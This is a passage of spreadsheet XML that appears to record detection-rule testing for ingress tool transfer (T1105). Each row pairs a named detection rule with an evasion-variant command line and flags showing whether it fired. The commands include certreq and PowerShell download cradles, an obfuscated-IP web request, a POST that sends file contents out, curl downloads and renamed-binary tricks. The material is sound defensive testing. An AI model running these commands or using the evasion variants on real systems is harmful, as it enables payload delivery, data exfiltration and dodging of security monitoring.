      <c r="G764" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H764" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I764" s="41" t="n"/>
      <c r="J764" s="41" t="n"/>
      <c r="K764" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="765" ht="15.75" customHeight="1" s="42">
      <c r="A765" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B765" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_diantz_remote_cab</t>
        </is>
      </c>
      <c r="C765" s="41" t="inlineStr">
        <is>
          <t>Suspicious Diantz Download and Compress Into a CAB File</t>
        </is>
      </c>
      <c r="D765" s="41" t="inlineStr">
        <is>
          <t>185d7418-f250-42d0-b72e-0c8b70661e93</t>
        </is>
      </c>
      <c r="E765" s="41" t="inlineStr">
        <is>
          <t>diantz.exe \\UNC\share\file.txt C:\Temp\output.cab</t>
        </is>
      </c>
      <c r="F765" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G765" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H765" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I765" s="41" t="n"/>
      <c r="J765" s="41" t="n"/>
      <c r="K765" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="766" ht="15.75" customHeight="1" s="42">
      <c r="A766" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B766" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C766" s="41" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D766" s="41" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E766" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c PrintBrm.exe -^f C:\Temp\backup.zip -b -s LOCAL</t>
        </is>
      </c>
      <c r="F766" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G766" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H766" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I766" s="41" t="n"/>
      <c r="J766" s="41" t="n"/>
      <c r="K766" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="767" ht="15.75" customHeight="1" s="42">
      <c r="A767" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B767" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_printbrm</t>
        </is>
      </c>
      <c r="C767" s="41" t="inlineStr">
        <is>
          <t>PrintBrm ZIP Creation of Extraction</t>
        </is>
      </c>
      <c r="D767" s="41" t="inlineStr">
        <is>
          <t>cafeeba3-01da-4ab4-b6c4-a31b1d9730c7</t>
        </is>
      </c>
      <c r="E767" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\spool\tools\PrintBrm.exe\t-f\tC:\Temp\backup.zip\t-b\t-s\tLOCAL</t>
        </is>
      </c>
      <c r="F767" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G767" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H767" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I767" s="41" t="n"/>
      <c r="J767" s="41" t="n"/>
      <c r="K767" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="768" ht="15.75" customHeight="1" s="42">
      <c r="A768" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B768" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C768" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D768" s="41" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E768" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A</t>
        </is>
      </c>
      <c r="F768" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G768" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H768" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I768" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J768" s="41" t="n"/>
      <c r="K768" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="769" ht="15.75" customHeight="1" s="42">
      <c r="A769" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B769" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C769" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D769" s="41" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E769" s="41" t="inlineStr">
        <is>
          <t>C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp "-a"</t>
        </is>
      </c>
      <c r="F769" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G769" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H769" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I769" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J769" s="41" t="n"/>
      <c r="K769" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="770" ht="15.75" customHeight="1" s="42">
      <c r="A770" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B770" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C770" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D770" s="41" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E770" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c C:\Windows\System32\replace.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp -^a</t>
        </is>
      </c>
      <c r="F770" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G770" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H770" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I770" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage (9292293b-8496-4715-9db6-37028dcda4b3)</t>
        </is>
      </c>
      <c r="J770" s="41" t="n"/>
      <c r="K770" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="771" ht="15.75" customHeight="1" s="42">
      <c r="A771" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B771" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_replace</t>
        </is>
      </c>
      <c r="C771" s="41" t="inlineStr">
        <is>
          <t>Replace.exe Usage</t>
        </is>
      </c>
      <c r="D771" s="41" t="inlineStr">
        <is>
          <t>9292293b-8496-4715-9db6-37028dcda4b3</t>
        </is>
      </c>
      <c r="E771" s="41" t="inlineStr">
        <is>
          <t>copy C:\Windows\System32\replace.exe C:\Users\thaim\AppData\Local\Temp\update.exe &amp;&amp; C:\Users\thaim\AppData\Local\Temp\update.exe "C:\AtomicRedTeam\atomics\T1105\src\redcanary.cab" C:\Users\thaim\AppData\Local\Temp /A</t>
        </is>
      </c>
      <c r="F771" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G771" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H771" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I771" s="41" t="inlineStr">
        <is>
          <t>Suspicious Copy From or To System Directory (fff9d2b7-e11c-4a69-93d3-40ef66189767)</t>
        </is>
      </c>
      <c r="J771" s="41" t="n"/>
      <c r="K771" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="772" ht="15.75" customHeight="1" s="42">
      <c r="A772" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B772" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C772" s="41" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D772" s="41" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E772" s="41" t="inlineStr">
        <is>
          <t>cmd.exe /c certreq.exe -P^ost -con^fig https://example.com c:\windows\win.ini C:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F772" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G772" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H772" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I772" s="41" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download (4480827a-9799-4232-b2c4-ccc6c4e9e12b)</t>
        </is>
      </c>
      <c r="J772" s="41" t="n"/>
      <c r="K772" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="773" ht="15.75" customHeight="1" s="42">
      <c r="A773" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B773" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_susp_certreq_download</t>
        </is>
      </c>
      <c r="C773" s="41" t="inlineStr">
        <is>
          <t>Suspicious Certreq Command to Download</t>
        </is>
      </c>
      <c r="D773" s="41" t="inlineStr">
        <is>
          <t>4480827a-9799-4232-b2c4-ccc6c4e9e12b</t>
        </is>
      </c>
      <c r="E773" s="41" t="inlineStr">
        <is>
          <t>certreq.exe\t-Post\t-config\thttps://example.com\tc:\windows\win.ini\tC:\Users\thaim\AppData\Local\Temp\Atomic-license.txt</t>
        </is>
      </c>
      <c r="F773" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G773" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H773" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I773" s="41" t="n"/>
      <c r="J773" s="41" t="n"/>
      <c r="K773" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="774" ht="15.75" customHeight="1" s="42">
      <c r="A774" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B774" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_com_cradles</t>
        </is>
      </c>
      <c r="C774" s="41" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation</t>
        </is>
      </c>
      <c r="D774" s="41" t="inlineStr">
        <is>
          <t>02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf</t>
        </is>
      </c>
      <c r="E774" s="41" t="inlineStr">
        <is>
          <t>[Type]::GetTypeFromCLSID( "0002DF01-0000-0000-C000-000000000046" )</t>
        </is>
      </c>
      <c r="F774" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G774" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H774" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I774" s="41" t="n"/>
      <c r="J774" s="41" t="n"/>
      <c r="K774" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="775" ht="15.75" customHeight="1" s="42">
      <c r="A775" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B775" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_com_cradles</t>
        </is>
      </c>
      <c r="C775" s="41" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation</t>
        </is>
      </c>
      <c r="D775" s="41" t="inlineStr">
        <is>
          <t>02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf</t>
        </is>
      </c>
      <c r="E775" s="41" t="inlineStr">
        <is>
          <t>powershell -Command "[Type]::GetTypeFromCLSID('0002DF01-0000-0000-C000-000000000046')"</t>
        </is>
      </c>
      <c r="F775" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G775" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H775" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I775" s="41" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation (02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf); Potential COM Objects Download Cradles Usage - Process Creation (02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf)</t>
        </is>
      </c>
      <c r="J775" s="41" t="n"/>
      <c r="K775" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="776" ht="15.75" customHeight="1" s="42">
      <c r="A776" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B776" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_download_com_cradles</t>
        </is>
      </c>
      <c r="C776" s="41" t="inlineStr">
        <is>
          <t>Potential COM Objects Download Cradles Usage - Process Creation</t>
        </is>
      </c>
      <c r="D776" s="41" t="inlineStr">
        <is>
          <t>02b64f1b-3f33-4e67-aede-ef3b0a5a8fcf</t>
        </is>
      </c>
      <c r="E776" s="41" t="inlineStr">
        <is>
          <t>[Type]::GetTypeFromCLSID( $env:CLSID ) ; $env:CLSID = '0002DF01-0000-0000-C000-000000000046'</t>
        </is>
      </c>
      <c r="F776" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G776" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H776" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I776" s="41" t="n"/>
      <c r="J776" s="41" t="n"/>
      <c r="K776" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="777" ht="15.75" customHeight="1" s="42">
      <c r="A777" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B777" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C777" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D777" s="41" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E777" s="41" t="inlineStr">
        <is>
          <t>powershell.exe  -Command "&amp; { (Invoke-WebRequest -Uri https://[0x8.0x8.0x8.0x8]/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT).Content }"</t>
        </is>
      </c>
      <c r="F777" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G777" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H777" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I777" s="41" t="inlineStr">
        <is>
          <t>Obfuscated IP Download Activity (cb5a2333-56cf-4562-8fcb-22ba1bca728d); Obfuscated IP Download Activity (cb5a2333-56cf-4562-8fcb-22ba1bca728d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J777" s="41" t="n"/>
      <c r="K777" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="778" ht="15.75" customHeight="1" s="42">
      <c r="A778" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B778" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C778" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D778" s="41" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E778" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { Invoke-RestMethod -Uri https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT }"</t>
        </is>
      </c>
      <c r="F778" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G778" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H778" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I778" s="41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778" s="41" t="n"/>
      <c r="K778" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="779" ht="15.75" customHeight="1" s="42">
      <c r="A779" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B779" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C779" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D779" s="41" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E779" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { (iwr https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT).Content }"</t>
        </is>
      </c>
      <c r="F779" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G779" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H779" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I779" s="41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779" s="41" t="n"/>
      <c r="K779" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="780" ht="15.75" customHeight="1" s="42">
      <c r="A780" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B780" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C780" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D780" s="41" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E780" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { (Invoke-WebRequest -Uri https://8.8.8.8/resolve?name=atomicredteam.$(Get-Random -Minimum 1 -Maximum 999999).127.0.0.1.xip.io&amp;type=TXT -UseBasicParsing).Content }"</t>
        </is>
      </c>
      <c r="F780" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G780" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H780" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I780" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP (1edff897-9146-48d2-9066-52e8d8f80a2f); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J780" s="41" t="n"/>
      <c r="K780" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="781" ht="15.75" customHeight="1" s="42">
      <c r="A781" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B781" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_direct_ip</t>
        </is>
      </c>
      <c r="C781" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution With DirectIP</t>
        </is>
      </c>
      <c r="D781" s="41" t="inlineStr">
        <is>
          <t>1edff897-9146-48d2-9066-52e8d8f80a2f</t>
        </is>
      </c>
      <c r="E781" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; { $content = Get-Content C:\\Windows\\System32\\notepad.exe; Invoke-WebRequest -Uri http://[127.0.0.1] -Method POST -Body $content }"</t>
        </is>
      </c>
      <c r="F781" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G781" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H781" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I781" s="41" t="inlineStr">
        <is>
          <t>Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); Potential Data Exfiltration Activity Via CommandLine Tools (7d1aaf3d-4304-425c-b7c3-162055e0b3ab); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J781" s="41" t="n"/>
      <c r="K781" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="782" ht="15.75" customHeight="1" s="42">
      <c r="A782" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B782" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C782" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D782" s="41" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E782" s="41" t="inlineStr">
        <is>
          <t>powershell.exe &amp; {Invoke-WebRequest -OutFile "C:\Users\$env:username\Desktop\AnyDesk.exe" https://download.anydesk.com/AnyDesk.exe}</t>
        </is>
      </c>
      <c r="F782" s="41" t="b">
        <v>0</v>
      </c>
      <c r="G782" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H782" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I782" s="41" t="n"/>
      <c r="J782" s="41" t="n"/>
      <c r="K782" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="783" ht="15.75" customHeight="1" s="42">
      <c r="A783" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B783" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C783" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D783" s="41" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E783" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -OutFile $env:TEMP\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F783" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G783" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H783" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I783" s="41" t="inlineStr">
        <is>
          <t>Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J783" s="41" t="n"/>
      <c r="K783" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="784" ht="15.75" customHeight="1" s="42">
      <c r="A784" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B784" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C784" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D784" s="41" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E784" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -Command "&amp; {Invoke-WebRequest -Uri https://download.anydesk.com/AnyDesk.exe -Method Get -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe}"</t>
        </is>
      </c>
      <c r="F784" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G784" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H784" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I784" s="41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784" s="41" t="n"/>
      <c r="K784" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="785" ht="15.75" customHeight="1" s="42">
      <c r="A785" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B785" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C785" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D785" s="41" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E785" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy Bypass -Command "Invoke-WebRequest -Uri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/LICENSE.txt -OutFile $env:TEMP\Atomic-license.txt"</t>
        </is>
      </c>
      <c r="F785" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G785" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H785" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I785" s="41" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d); Usage Of Web Request Commands And Cmdlets (9fc51a3c-81b3-4fa7-b35f-7c02cf10fd2d)</t>
        </is>
      </c>
      <c r="J785" s="41" t="n"/>
      <c r="K785" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="786" ht="15.75" customHeight="1" s="42">
      <c r="A786" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B786" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_invoke_webrequest_download</t>
        </is>
      </c>
      <c r="C786" s="41" t="inlineStr">
        <is>
          <t>Suspicious Invoke-WebRequest Execution</t>
        </is>
      </c>
      <c r="D786" s="41" t="inlineStr">
        <is>
          <t>5e3cc4d8-3e68-43db-8656-eaaeefdec9cc</t>
        </is>
      </c>
      <c r="E786" s="41" t="inlineStr">
        <is>
          <t>powershell.exe -NoLogo -Command "Invoke-WebRequest -Uri https://download.anydesk.com/AnyDesk.exe -OutFile C:\Users\$env:username\Desktop\AnyDesk.exe"</t>
        </is>
      </c>
      <c r="F786" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G786" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H786" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I786" s="41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786" s="41" t="n"/>
      <c r="K786" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="787" ht="15.75" customHeight="1" s="42">
      <c r="A787" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B787" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C787" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D787" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E787" s="41" t="inlineStr">
        <is>
          <t>curl.exe -sSL "[https://attachment.outlook.live.net:443/owa/test.txt](https://attachment.outlook.live.net:443/owa/test.txt)" -o "C:\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F787" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G787" s="41" t="b">
        <v>1</v>
      </c>
      <c r="H787" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I787" s="41" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468)</t>
        </is>
      </c>
      <c r="J787" s="41" t="n"/>
      <c r="K787" s="41" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="788" ht="15.75" customHeight="1" s="42">
      <c r="A788" s="41" t="inlineStr">
        <is>
          <t>t1105</t>
        </is>
      </c>
      <c r="B788" s="41" t="inlineStr">
        <is>
          <t>proc_creation_win_susp_download_office_domain</t>
        </is>
      </c>
      <c r="C788" s="41" t="inlineStr">
        <is>
          <t>Suspicious Download from Office Domain</t>
        </is>
      </c>
      <c r="D788" s="41" t="inlineStr">
        <is>
          <t>00d49ed5-4491-4271-a8db-650a4ef6f8c1</t>
        </is>
      </c>
      <c r="E788" s="41" t="inlineStr">
        <is>
          <t>curl.exe -sSL "[https://attachment.outlook.live.net/owa/./test.txt](https://attachment.outlook.live.net/owa/./test.txt)" -o "C:\Temp\test.txt"</t>
        </is>
      </c>
      <c r="F788" s="41" t="b">
        <v>1</v>
      </c>
      <c r="G788" s="41" t="b">
        <v>0</v>
      </c>
      <c r="H788" s="41" t="b">
        <v>0</v>
      </c>
      <c r="I788" s="41" t="inlineStr">
        <is>
          <t>Suspicious Curl.EXE Download (e218595b-bbe7-4ee5-8a96-f32a24ad3468); Suspicious Download from Office Domain (00d49ed5-4491-4271-a8db-650a4ef6f8c1)</t>
        </is>
      </c>
      <c r="J788" s="41" t="n"/>
      <c r="K788" s="41" t="b">
